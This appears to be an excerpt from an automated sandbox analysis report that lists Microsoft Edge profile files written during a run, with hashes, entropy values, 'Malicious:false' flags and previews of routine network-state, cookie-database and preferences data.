                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):1664
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.33106012928878
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:YcFGJ/I3RdsIyZVMdmRdsjSyZFRudFGRRds6Z6ma3yeesw6maPsw6C1VdsMZC52X:YcgCzslts7fcKseleeBkBRs0CgH2bx9+
                                                                                                                                                                                                                                                                                    MD5:86D0FD03103952DBE2BC4BD3CFB8F441
                                                                                                                                                                                                                                                                                    SHA1:2C2F649717E2019C915AD443722C3D622890A3E6
                                                                                                                                                                                                                                                                                    SHA-256:D330EC88644B8525287430E91BDFCB27CB485CEF01804825ABC3770A786BA90F
                                                                                                                                                                                                                                                                                    SHA-512:04A4395BEBFEB51617ED93C55D20F4151A836DAFF192E2807359E7D2F31D03B42B28D891EE8D0DC734B4AAB8795E46356870AC004597C6656F941E9651DDA9F4
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381999071743606","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13381999076776126","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379500679485632","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymizatio

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\413b2a2f-49f5-4142-a62a-87fab7a0a900.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1419
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                                                    MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                                                    SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                                                    SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                                                    SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\55121b6e-e8e2-4940-9172-e62bbba36594.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\7b25cb5d-e2da-44fe-a925-728358d8c8d8.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                    Entropy (8bit):2.7852848399253616
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:tT1oUPTpZuL29/NYKLu6u7ZUcXcf0L/ZJVb:V1oUbp0L291JxaFXI0LhJVb
                                                                                                                                                                                                                                                                                    MD5:1E1C3A56AF3C6CF08868A7C04E32EE17
                                                                                                                                                                                                                                                                                    SHA1:1D5B3122F84E087F9F7E6B15AC6128C6FED89152
                                                                                                                                                                                                                                                                                    SHA-256:A18D8E8E4F519629610F08B107807D414EDC3A88064C4259102D08AA065B7F83
                                                                                                                                                                                                                                                                                    SHA-512:A0B2F3B04CB3C46B6528E31ED37DE1F9FE316AFE45088FE93EF37F0D11AA209EE1DB9F0121A8B486564CDE63BEF6F4DE43199D08A4B0D07F34C09A9EE8F97912
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1419
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                                                    MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                                                    SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                                                    SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                                                    SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF4bbca.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1419
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.336110615415376
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7np+:YXs/tsbfc7leeEscgCgakhYhbx9+
                                                                                                                                                                                                                                                                                    MD5:7D870539B6C4EE40FA5CFD87A3D4BFEC
                                                                                                                                                                                                                                                                                    SHA1:F45BE07A3A05615856688219AFE6713EBABBAC2C
                                                                                                                                                                                                                                                                                    SHA-256:73513F7A38830E47624257EF04A4F73BF174FD1FEBAC172AA416BF6470930F90
                                                                                                                                                                                                                                                                                    SHA-512:90EABCE74F8CBB5FF1F96566E1293887BB3DB36C9E32F6C619D1EC7C9AAE504221CDEC2DD1468915A0A06A65E472C5446731838C89E665EBD9FA114F12261327
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492604479295","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492605127283","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343492606741506","port":443,"protocol_str":"quic"}],"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"anonymizatio

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):36864
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.2145749921937887
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:TaIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBTM7:uIEumQv8m1ccnvS68qYdv
                                                                                                                                                                                                                                                                                    MD5:D1B6B2EB9D31FED5D8B44795724C8476
                                                                                                                                                                                                                                                                                    SHA1:1E201D41AD5AB5DB200EF7E5B55C1B1F78060B0C
                                                                                                                                                                                                                                                                                    SHA-256:B242BE58233C0F39DFD04CCBC25B9D618F4BE70BA62F13250FA61B06190BE250
                                                                                                                                                                                                                                                                                    SHA-512:5DF3C764B6251267E8C4CC2A4DFC4B48444C13BC4D5C5C797556A5D01A1FD50C3130DBCEE8A11554EF64F2B0EBDCFF12C0A5FD0C5D90C5971EDC81BD16D7FBE1
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3ad58.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF3c758.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\da9f1324-62e3-4f82-8186-c21bf1f0806a.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):20480
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                    MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                    SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                    SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                    SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9713
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.111389311051109
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:stxkdpe+suwsZihUktAm8dbV+FAAQA66WkaFIMY1PZYJ:stxQlsuwfhEbGvQx6WkaTYw
                                                                                                                                                                                                                                                                                    MD5:3A53E70AEE624CE0A5C22B64DBF18739
                                                                                                                                                                                                                                                                                    SHA1:B3CDAF8CB376A4B8A67A1327AEBA3449E77CB8AB
                                                                                                                                                                                                                                                                                    SHA-256:A0E51D00F3DDB126443BB7A0A77CCD4D2290EF40AE48DE60AAE78BA7B67C5B72
                                                                                                                                                                                                                                                                                    SHA-512:9C9FF148A630EFE600B2657A40237B009DE5EC278836BBC187D17E56B55BFCC339B78A7FE6CB03B5AED164D54ECCBEC8F74A14452F6E5477631CAFA811CD9C5F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379407068433583","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF3f965.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9713
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.111389311051109
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:stxkdpe+suwsZihUktAm8dbV+FAAQA66WkaFIMY1PZYJ:stxQlsuwfhEbGvQx6WkaTYw
                                                                                                                                                                                                                                                                                    MD5:3A53E70AEE624CE0A5C22B64DBF18739
                                                                                                                                                                                                                                                                                    SHA1:B3CDAF8CB376A4B8A67A1327AEBA3449E77CB8AB
                                                                                                                                                                                                                                                                                    SHA-256:A0E51D00F3DDB126443BB7A0A77CCD4D2290EF40AE48DE60AAE78BA7B67C5B72
                                                                                                                                                                                                                                                                                    SHA-512:9C9FF148A630EFE600B2657A40237B009DE5EC278836BBC187D17E56B55BFCC339B78A7FE6CB03B5AED164D54ECCBEC8F74A14452F6E5477631CAFA811CD9C5F
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379407068433583","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4365e.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):9713
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.111389311051109
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:192:stxkdpe+suwsZihUktAm8dbV+FAAQA66WkaFIMY1PZYJ:stxQlsuwfhEbGvQx6WkaTYw
                                                                                                                                                                                                                                                                                    MD5:3A53E70AEE624CE0A5C22B64DBF18739
                                                                                                                                                                                                                                                                                    SHA1:B3CDAF8CB376A4B8A67A1327AEBA3449E77CB8AB
                                                                                                                                                                                                                                                                                    SHA-256:A0E51D00F3DDB126443BB7A0A77CCD4D2290EF40AE48DE60AAE78BA7B67C5B72
                                                                                                                                                                                                                                                                                    SHA-512:9C9FF148A630EFE600B2657A40237B009DE5EC278836BBC187D17E56B55BFCC339B78A7FE6CB03B5AED164D54ECCBEC8F74A14452F6E5477631CAFA811CD9C5F
                                                                                                                                                                                                                                                                                    Malicious:false
